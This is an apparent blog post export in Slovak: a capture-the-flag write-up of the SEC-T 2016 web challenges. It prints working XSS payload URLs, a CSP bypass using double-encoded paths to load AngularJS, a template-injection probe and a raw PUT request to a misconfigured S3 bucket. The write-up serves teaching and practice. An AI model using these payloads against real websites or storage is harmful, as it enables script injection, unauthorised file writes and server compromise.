{"id":2001,"date":"2016-09-12T13:19:58","date_gmt":"2016-09-12T13:19:58","guid":{"rendered":"http:\/\/nethemba.com\/cs\/ctf-sect-etf-rocks\/"},"modified":"2016-09-13T07:36:31","modified_gmt":"2016-09-13T07:36:31","slug":"ctf-sect-ctf-rocks","status":"publish","type":"post","link":"https:\/\/nethemba.com\/cs\/ctf-sect-ctf-rocks\/","title":{"rendered":"CTF sect.ctf.rocks"},"content":{"rendered":"<p><span style=\"font-family: 'Open Sans', sans-serif;\">Nieko\u013eko dn\u00ed nazad\u00a0sa konala vo \u0160v\u00e9dsku bezpe\u010dnostn\u00e1 konferencia <a href=\"https:\/\/www.sec-t.org\">SECT-T<\/a>, ktorej s\u00fa\u010das\u0165ou bolo <a href=\"http:\/\/sect.ctf.rocks\">CTF<\/a>.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Vzh\u013eadom k tomu, \u017ee prebiehala po\u010das pracovn\u00fdch dn\u00ed sa CTF z\u00fa\u010dastnili len desiatky t\u00edmov (be\u017ene b\u00fdva \u00fa\u010das\u0165 nieko\u013ekon\u00e1sobne vy\u0161\u0161ia). Ako to na podobn\u00fdch CTF b\u00fdva, \u00falohy boli rozdelen\u00e9 do nieko\u013ek\u00fdch kateg\u00f3ri\u00ed, v tomto pr\u00edpade i\u0161lo o bin\u00e1rnu exploit\u00e1ciu, reverse engineering, weby a kateg\u00f3riu misc, ktor\u00e1 sa najviac podobala na forenzn\u00fa anal\u00fdzu.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Najzauj\u00edmavej\u0161ie mi pri\u0161li \u00falohy v kateg\u00f3rii web, ktor\u00e9 naprogramoval <a href=\"https:\/\/twitter.com\/avlidienbrunn\">Mathias Karlsson<\/a>, popul\u00e1rny researcher v oblasti webovej bezpe\u010dnosti a ke\u010f\u017ee pokr\u00fdvali modern\u00e9 \u00fatoky (in\u0161pirovan\u00e9 aj posledn\u00fdmi n\u00e1lezmi z r\u00f4znych bug bounty programov), pop\u00ed\u0161em ich rie\u0161enie podrobnej\u0161ie.<\/span><\/p>\n<h3><strong><span style=\"font-family: 'Open Sans', sans-serif;\">Admin I &#8211; Web (100)<\/span><\/strong><\/h3>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">V tejto najjednoduch\u0161ej \u00falohe bolo cie\u013eom spusti\u0165 potenci\u00e1lne \u0161kodliv\u00fd JavaScript k\u00f3d, ako &#8222;proof of concept&#8220; to znamenalo zavolanie funkcie <em>alert(1)<\/em>.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">HTML k\u00f3d so zadan\u00edm:<\/span><\/p>\n<hr \/>\n<p><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;!DOCTYPE html&gt;<\/span><\/code><\/p>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;html&gt;<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;head&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;title&gt;XSS1&lt;\/title&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;link rel=\"stylesheet\" href=\"\/custom.css\" \/&gt;<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/head&gt;<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;body&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;main id=\"main\"&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;p&gt;Can you alert(1) &lt;a href=\"?xss=stuff\"&gt;this page&lt;\/a&gt; (in firefox)?&lt;\/p&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;p&gt;Send your XSS link for flag here:&lt;\/p&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;form method=\"post\" action=\"contact.php\"&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;input type=\"text\" name=\"url\" value=\"\" placeholder=\"http:\/\/xss1.sect.ctf.rocks\/?xss=\"&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;input type=\"submit\" name=\"submit\" value=\"Send\"&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/form&gt;<\/span><\/code><\/div>\n<div><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/main&gt;<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/body&gt;<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/html&gt;<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;script&gt;<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">dontrunthisscript();<\/span><\/code><\/div>\n<div><code><span style=\"font-family: 'Open Sans', sans-serif;\">var a = \"stuff\";<\/span><\/code><\/div>\n<p><code><code><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/script&gt;<\/span><\/code><\/code><\/p>\n<hr \/>\n<p><code><\/code>Tu dok\u00e1\u017eeme vklada\u0165 k\u00f3d do premennej <em>a (stuff).<\/em>\u00a0Probl\u00e9m predstavuje funkcia <em>dontrunthisscript()<\/em>, ktor\u00e1 sa s\u00edce zavol\u00e1, nie je v\u0161ak nikde definovan\u00e1. JavaScript interpreter vyp\u00ed\u0161e chybu a odmieta spusti\u0165 \u010fal\u0161\u00ed k\u00f3d. Rie\u0161enie je mo\u017en\u00e9 sa do\u010d\u00edta\u0165 napr\u00edklad na\u00a0<a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Functions\">https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Functions<\/a>:<\/p>\n<p>Unlike functions defined by function expression or by the Function constructor, a function defined by a function declaration can be used before the function declaration itself. For example:<\/p>\n<p>foo(); \/\/ alerts FOO!<\/p>\n<p>function foo() {<\/p>\n<p>alert(&#8218;FOO!&#8216;);<\/p>\n<p>}<\/p>\n<p>V\u00fdsledn\u00fd exploit m\u00e1 tvar:<\/p>\n<p><a href=\"http:\/\/xss1.sect.ctf.rocks\/?xss=stuff%22;alert(1);function%20dontrunthisscript(){};\/\/\"><code><span style=\"font-family: 'Open Sans', sans-serif;\">http:\/\/xss1.sect.ctf.rocks\/?xss=stuff%22;alert(1);function%20dontrunthisscript(){};\/\/<\/span><\/code><\/a><\/p>\n<div><\/div>\n<h3><span style=\"font-family: 'Open Sans', sans-serif;\">Admin II &#8211; Web (200)<\/span><\/h3>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">\u00daloha je podobn\u00e1 ako predt\u00fdm, nie je v\u0161ak mo\u017en\u00e9 pou\u017ei\u0165 z\u00e1tvorky a znak rovn\u00e1 sa, k \u010domu by sta\u010dilo aplikova\u0165 zn\u00e1my <a href=\"http:\/\/utf-8.jp\/public\/jjencode.html\">enk\u00f3der<\/a>\u00a0pre nealfanumerick\u00fd payload.\u00a0<\/span><span style=\"font-family: 'Open Sans', sans-serif;\">Ak si niekto spomenie na <a href=\"https:\/\/github.com\/cure53\/XSSChallengeWiki\/wiki\/prompt.ml\">XSS challenge<\/a>\u00a0z roku 2014, rie\u0161en\u00edm bolo pou\u017ei\u0165 s\u00e9mantiku z ES6, konkr\u00e9tne:<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\"><a href=\"http:\/\/xss2.sect.ctf.rocks\/?xss=stuff%22;eval.call&#96;${'alert\\x281\\x29'}&#96;;\/\/\">http:\/\/xss2.sect.ctf.rocks\/?xss=stuff%22;eval.call`${&#8218;alert\\x281\\x29&#8216;}`;\/\/<\/a><\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Pre doplnkov\u00e9 inform\u00e1cie odpor\u00fa\u010dam pre\u0161tudova\u0165 si referencie.\u00a0<\/span><\/p>\n<h3><span style=\"font-family: 'Open Sans', sans-serif;\">Admin III &#8211; Web (400)<\/span><\/h3>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Zdrojov\u00fd HTML a zadanie je op\u00e4\u0165 takmer identick\u00e9, v\u0161imneme si v\u0161ak rozdiel v hlavi\u010dke:<\/span><\/p>\n<div>\n<hr \/>\n<\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">$ curl -i &#8222;xss3.sect.ctf.rocks\/?xss=stuff&#8220;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">HTTP\/1.1 200 OK<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Server: nginx\/1.10.0 (Ubuntu)<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Date: Sat, 10 Sep 2016 10:17:35 GMT<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Content-Type: text\/html; charset=UTF-8<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Transfer-Encoding: chunked<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Connection: keep-alive<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Content-Security-Policy: default-src &#8218;none&#8216;; style-src &#8218;self&#8216;; img-src &#8218;self&#8216;; script-src https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Set-Cookie: PHPSESSID=gva2nj4bg7vgmabh5hli2nkk41; path=\/<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Expires: Thu, 19 Nov 1981 08:52:00 GMT<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Cache-Control: no-store, no-cache, must-revalidate<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Pragma: no-cache<\/span><\/div>\n<div><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;!DOCTYPE html&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;html&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;head&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;title&gt;XSS3&lt;\/title&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;link rel=&#8220;stylesheet&#8220; href=&#8220;\/custom.css&#8220; \/&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/head&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;body&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;main id=&#8220;main&#8220;&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;p&gt;Can you alert(1) &lt;a href=&#8220;?xss=stuff&#8220;&gt;this page&lt;\/a&gt; (in firefox)?&lt;\/p&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;p&gt;Send your XSS link for flag here:&lt;\/p&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;form method=&#8220;post&#8220; action=&#8220;contact.php&#8220;&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;input type=&#8220;text&#8220; name=&#8220;url&#8220; value=&#8220;&#8220; placeholder=&#8220;http:\/\/xss3.sect.ctf.rocks\/?xss=&#8220;&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;input type=&#8220;submit&#8220; name=&#8220;submit&#8220; value=&#8220;Send&#8220;&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/form&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/main&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/body&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/html&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">stuff<\/span><\/div>\n<div>\n<hr \/>\n<\/div>\n<div>\n<p>Ako vid\u00edme, cie\u013eom je prekona\u0165 CSP, ktor\u00e9 je implementovan\u00e9 nasledovne:<\/p>\n<p>default-src &#8218;none&#8216;; style-src &#8218;self&#8216;; img-src &#8218;self&#8216;; script-src https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/<\/p>\n<p>T\u00fdmto je mo\u017en\u00e9 nalinkova\u0165 JavaScript jedine z danej CDN siete, kde sa be\u017ene nach\u00e1dzaj\u00fa aj u\u017e neaktu\u00e1lne verzie. P\u00f4vodne som chcel postupova\u0165 pou\u017eit\u00edm starej deravej kni\u017enice &#8222;JQuery&#8220;, ke\u010f\u017ee je v\u0161ak nastaven\u00e9 obmedzenie aj pre vlastn\u00e9 elementy a selektory, ne\u0161lo t\u00fato techniku pou\u017ei\u0165.<\/p>\n<\/div>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Zauj\u00edmav\u00e9 sp\u00f4soby, ako ob\u00eds\u0165 CSP s\u00fa pop\u00edsan\u00e9 op\u00e4\u0165 na <a href=\"https:\/\/github.com\/cure53\/XSSChallengeWiki\/wiki\/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22\">XSSChallengeWiki<\/a>.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Jeden z nich sa nach\u00e1dza ni\u017e\u0161ie:<\/span><\/p>\n<div>\n<hr \/>\n<\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&#8222;ng-app ng-csp&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;base href=\/\/ajax.googleapis.com\/ajax\/libs\/&gt;&lt;script\u00a0src=angularjs\/1.0.1\/angular.js&gt;&lt;\/script&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;script src=prototype\/1.7.2.0\/prototype.js&gt;&lt;\/script&gt;{{$on.curry.call().alert(1337<\/span><\/div>\n<div>\n<hr \/>\n<\/div>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Postup je zdokumentovan\u00fd napr\u00edklad <a href=\"https:\/\/conference.hitb.org\/hitbsecconf2016ams\/materials\/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf\">tu<\/a>, strana 17.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Tu ale\u00a0nast\u00e1va probl\u00e9m, ke\u010f\u017ee CSP je limitovan\u00e9 pre cestu <em>\/ajax\/libs\/jquery.<\/em>\u00a0My v\u0161ak potrebujeme pristupova\u0165 do <em>\/ajax\/libs\/angularjs\/<\/em>.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Ak si uvedom\u00edme, \u017ee CSP m\u00f4\u017ee by\u0165 zranite\u013en\u00e9 na <em>double encoding<\/em>, \u00falohu m\u00e1me vyrie\u0161en\u00fa:<\/span><\/p>\n<div>\n<hr \/>\n<\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;script src=&#8220;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/..%252fangular.js\/1.0.1\/angular.js&#8220;&gt;&lt;\/script&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;script src=&#8220;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/..%252fprototype\/1.7.2\/prototype.js&#8220;&gt;&lt;\/script&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;div ng-app ng-csp&gt;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">{{$on.curry.call().alert(1)}}<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/div&gt;<\/span><\/div>\n<div>\n<hr \/>\n<\/div>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Pre prehliada\u010d plat\u00ed, \u017ee <em>\/test%2f1337<\/em> je interpretovan\u00fd rovnako ako <em>\/test\/1337<\/em>. Nie je to ale pr\u00edpad pre implement\u00e1ciu CSP, ktor\u00e1 pova\u017euje <em>\/test%2f1337<\/em>\u00a0za s\u00fabor nach\u00e1dzaj\u00faci sa v adres\u00e1ri\u00a0<em>\/<\/em>, \u010do moment\u00e1lne predstavuje bezpe\u010dnostn\u00fa dieru v aktu\u00e1lnej verzii prehliada\u010da Firefox.<\/span><\/p>\n<h3><span style=\"font-family: 'Open Sans', sans-serif;\">Web 300 Techno_Tech<\/span><\/h3>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Zranite\u013enos\u0165, ktor\u00fa sa mi po p\u00e1r sekund\u00e1ch podarilo objavi\u0165 sa t\u00fdkala Template Injection. Je identick\u00e1 ako pri ned\u00e1vnom hacku webu pre <a href=\"https:\/\/hackerone.com\/reports\/125980\">Uber<\/a>, kde sa program\u00e1tor rozhodol nap\u00edsa\u0165 vlastn\u00fd template pre 404 handler, ktor\u00fd vyzer\u00e1 nasledovne:<\/span><\/p>\n<div>\n<hr \/>\n<\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">\u00a0 \u00a0 \u00a0 \u00a0template = &#8220;&#8216;<\/span><\/div>\n<div><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">{%% block body %%}<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;div class=&#8220;center-content error&#8220;&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;h1&gt;Oops! That page doesn&#8217;t exist.&lt;\/h1&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;h3&gt;%s&lt;\/h3&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">&lt;\/div&gt;<\/span><\/div>\n<div>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <span style=\"font-family: 'Open Sans', sans-serif;\">{%% endblock %%}<\/span><\/div>\n<div>\n<hr \/>\n<\/div>\n<div><\/div>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Pri pou\u017eit\u00ed URL <em>\/test{{9*9}}<\/em>\u00a0n\u00e1m webov\u00fd server vr\u00e1ti odpove\u010f o neexistenci s\u00faboru <em>test81<\/em>. Tento poznatok je mo\u017en\u00e9 eskalova\u0165 \u010falej a v\u00e4\u010d\u0161inou u\u017e dok\u00e1\u017ee \u00fato\u010dn\u00edk pre\u010d\u00edta\u0165 alebo zapisova\u0165 do \u013eubovoln\u00e9ho s\u00faboru na disku, pr\u00edpadne zmenou konfigura\u010dn\u00e9ho s\u00faboru spusti\u0165 \u013eubovoln\u00fd pr\u00edkaz s pr\u00e1vami webov\u00e9ho pou\u017e\u00edvate\u013ea. Moje rie\u0161enie je pop\u00edsan\u00e9 <a href=\"https:\/\/github.com\/73696e65\/ctf-notes\/blob\/master\/2016-sect.ctf.rocks\/Web-300-Techno_Tech.md\">tu<\/a>, in\u0161pirovan\u00e9 blogom, uveden\u00fdm v referenci\u00e1ch, kde sa do\u010d\u00edtate podrobnej\u0161ie detaily.<\/span><\/p>\n<h3><span style=\"font-family: 'Open Sans', sans-serif;\">iFile &#8211; Web (250)<\/span><\/h3>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Webov\u00e1 str\u00e1nka obsahovala odkaz <a href=\"http:\/\/filer.sect.ctf.rocks\/?bulkfile=http:\/\/files.filer.sect.ctf.rocks\/example.txt\">http:\/\/filer.sect.ctf.rocks\/?bulkfile=http:\/\/files.filer.sect.ctf.rocks\/example.txt<\/a>, v s\u00fabore <em>example.txt<\/em>\u00a0sa nach\u00e1dzali n\u00e1zvy dvoch s\u00faborov, obsah prv\u00e9ho z nich sa vlo\u017eil do hlavi\u010dky, druh\u00fd tvoril text str\u00e1nky.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Samotn\u00e1 str\u00e1nka nevykazovala nijak\u00e9 zn\u00e1me bezpe\u010dnostn\u00e9 nedostatky. &#8222;<em>files.filer.sect.ctf.rocks&#8220; <\/em>je <a href=\"https:\/\/docs.aws.amazon.com\/AmazonS3\/latest\/dev\/UsingBucket.html\">Amazon S3 Bucket<\/a>\u00a0a pokia\u013e nie s\u00fa dobre nastaven\u00e9 opr\u00e1vnenia, je mo\u017en\u00e9 pre anonymn\u00e9ho \u00fato\u010dn\u00edka zisti\u0165 zoznam s\u00faborov v buckete, skop\u00edrova\u0165 ich alebo uploadn\u00fa\u0165. Prakticky bola t\u00e1to zranite\u013enos\u0165 demon\u0161trovan\u00e1 napr\u00edklad <a href=\"https:\/\/hackerone.com\/reports\/128088\">tu<\/a>\u00a0a <a href=\"https:\/\/hackerone.com\/reports\/152584\">tu<\/a>\u00a0pre weby Hackerone a Harvest.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Rie\u0161enie:<\/span><\/p>\n<hr \/>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">$ telnet files.filer.sect.ctf.rocks 80<\/span><\/p>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Trying 54.231.17.73&#8230;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Connected to s3-1-w.amazonaws.com.<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Escape character is &#8218;^]&#8216;.<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">PUT \/abc.txt HTTP\/1.1<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Host: files.filer.sect.ctf.rocks<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Date: Sat, 10 Sep 2016 09:21:02 GMT<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Content-Type: text\/plain<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Content-Length: 32<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">\/files\/flag.php<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">\/files\/flag.php<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">HTTP\/1.1 200 OK<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">x-amz-id-2: 3GLe0t1bgnmvrVbZic0CAjd8x5mwPBJRR6stEJj+e6\/7x+8tZe0jteImuhxukQKZJFa6z0yOnrY=<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">x-amz-request-id: 3F732267A35970EC<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Date: Sat, 10 Sep 2016 09:21:26 GMT<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">ETag: &#8222;c1f1b2f47ed3ad9c7785dc233fcb1ce5&#8220;<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Content-Length: 0<\/span><\/div>\n<div><span style=\"font-family: 'Open Sans', sans-serif;\">Server: AmazonS3<\/span><\/div>\n<div>\n<hr \/>\n<\/div>\n<div><\/div>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Po nav\u0161t\u00edven\u00ed <a href=\"http:\/\/filer.sect.ctf.rocks\/?bulkfile=http:\/\/files.filer.sect.ctf.rocks\/abc.txt\">http:\/\/filer.sect.ctf.rocks\/?bulkfile=http:\/\/files.filer.sect.ctf.rocks\/abc.txt<\/a>\u00a0sa zobrazilo rie\u0161enie.<\/span><\/p>\n<h3><span style=\"font-family: 'Open Sans', sans-serif;\">Z\u00e1ver:<\/span><\/h3>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Ke\u010f\u017ee na\u010dasovanie s\u00fa\u0165a\u017ee nebolo pre m\u0148a pr\u00e1ve najlep\u0161ie a venoval som s\u00fa\u0165a\u017ei iba nieko\u013eko hod\u00edn vo\u013en\u00e9ho \u010dasu, skon\u010dil som len v prvej desiatke. \u00dalohy neboli a\u017e tak n\u00e1ro\u010dn\u00e9 ako v pr\u00edpade in\u00fdch prest\u00ed\u017enych CTF (PPP, CSAW, ASIS), napriek tomu predstavovali v\u00fdzvu a pod\u013ea m\u0148a reflektovali dostato\u010dne aj stupe\u0148 komplexity, ktor\u00e1 je be\u017en\u00e1 pri hackovan\u00ed r\u00f4znych bug bounty programov.<\/span><\/p>\n<p><span style=\"font-family: 'Open Sans', sans-serif;\">Pokia\u013e by ste si chceli \u00falohy sami vysk\u00fa\u0161a\u0165, ich mirror je v \u010dase p\u00edsania tohto \u010dl\u00e1nku k dispoz\u00edcii na str\u00e1nke <a href=\"http:\/\/mirror.sect.ctf.rocks\">http:\/\/mirror.sect.ctf.rocks<\/a>.<\/span><\/p>\n<h4><strong><span style=\"font-family: 'Open Sans', sans-serif;\">Referencie:<\/span><\/strong><\/h4>\n<div><a href=\"https:\/\/cure53.de\/es6-for-penetration-testers.pdf\"><span style=\"font-family: 